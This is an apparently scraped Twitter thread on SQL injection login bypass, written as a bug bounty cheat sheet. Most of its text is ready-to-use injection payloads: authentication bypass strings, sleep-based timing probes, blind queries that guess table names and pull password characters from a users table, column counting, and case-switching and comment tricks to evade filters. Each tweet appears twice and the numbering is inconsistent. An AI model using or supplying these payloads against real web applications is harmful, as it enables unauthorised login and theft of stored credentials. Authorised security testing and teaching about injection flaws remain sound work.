Login Bypass 🌵
#SQLi
param='
param="
param=' or 1=1
param=' or 1=0
param=' and 1=1
' or sleep(2) and 1=1#
' or sleep(2)#
admin' and sleep(2)#
' union select sleep(2),null#
' union select sleep(2),null,null,null,null#
#cybersecurity #hacking #bugbountytips #infosec
1/9 👇🏿✔
#SQLi
param='
param="
param=' or 1=1
param=' or 1=0
param=' and 1=1
' or sleep(2) and 1=1#
' or sleep(2)#
admin' and sleep(2)#
' union select sleep(2),null#
' union select sleep(2),null,null,null,null#
#cybersecurity #hacking #bugbountytips #infosec
1/9 👇🏿✔
param=' or 1=1#
param=' or 1=1
param=' or 1=1 //
param= or 1=1#
param=and or 1=1#
param=' or 1=1
This is the most classic, standard first test:
' or '1'='1
Then you have:
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
#cybersecurity #hacking #bugbountytips
2/9 👇🏿✔
param=' or 1=1
param=' or 1=1 //
param= or 1=1#
param=and or 1=1#
param=' or 1=1
This is the most classic, standard first test:
' or '1'='1
Then you have:
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
#cybersecurity #hacking #bugbountytips
2/9 👇🏿✔
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
3/9 👇🏿✔
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
3/9 👇🏿✔
If nothing works try these Blind sql payloads:
' AND (select 1)=1
Guessing Table name:
' AND (select 1 from admin limit 0,1)=1
' AND (select 1 from users limit 0,1)=1
#cybersecurity #hacking #bugbountytips
4/9 ✔👇🏿
' AND (select 1)=1
Guessing Table name:
' AND (select 1 from admin limit 0,1)=1
' AND (select 1 from users limit 0,1)=1
#cybersecurity #hacking #bugbountytips
4/9 ✔👇🏿
Guessing Columns:
' AND (select substring(concat(1,pass),1,1) from users limit 0,1)=1
' AND (select substring(concat(1,password),1,1) from users limit 0,1)=
#cybersecurity #hacking #bugbountytips
5/6✔👇🏿
' AND (select substring(concat(1,pass),1,1) from users limit 0,1)=1
' AND (select substring(concat(1,password),1,1) from users limit 0,1)=
#cybersecurity #hacking #bugbountytips
5/6✔👇🏿
Now determine number of columns in the current table
param=' or 1=1 order by 1#
param=' or 1=1 order by x.x.x.x
let say there are 3 columns
#cybersecurity #hacking #bugbountytips
6/9 👇🏿✔
param=' or 1=1 order by 1#
param=' or 1=1 order by x.x.x.x
let say there are 3 columns
#cybersecurity #hacking #bugbountytips
6/9 👇🏿✔
BYPASSING filters
we can use case switching or commenting to bypass normal filters such as union, select
param=' or 1=0 UniOn selEct id,null,null FroM public.info
param=' or 1=0 un//ion sele//ct id,null,null fr/**/om public.info# works in mssql
7/9 👇🏿
we can use case switching or commenting to bypass normal filters such as union, select
param=' or 1=0 UniOn selEct id,null,null FroM public.info
param=' or 1=0 un//ion sele//ct id,null,null fr/**/om public.info# works in mssql
7/9 👇🏿
Useful Resources
pentestmonkey.net/cheat-sheet/sq…
garage4hackers.com/showthread.php…
#cybersecurity #hacking #bugbountytips
8/9✔👇🏿
pentestmonkey.net/cheat-sheet/sq…
garage4hackers.com/showthread.php…
#cybersecurity #hacking #bugbountytips
8/9✔👇🏿
Thank you so much for reading these threads ☺👍
Hope you will like these
You can follow me if you want more threads like these
😃
Hope you will like these
You can follow me if you want more threads like these
😃
• • •
Missing some Tweet in this thread? You can try to
force a refresh
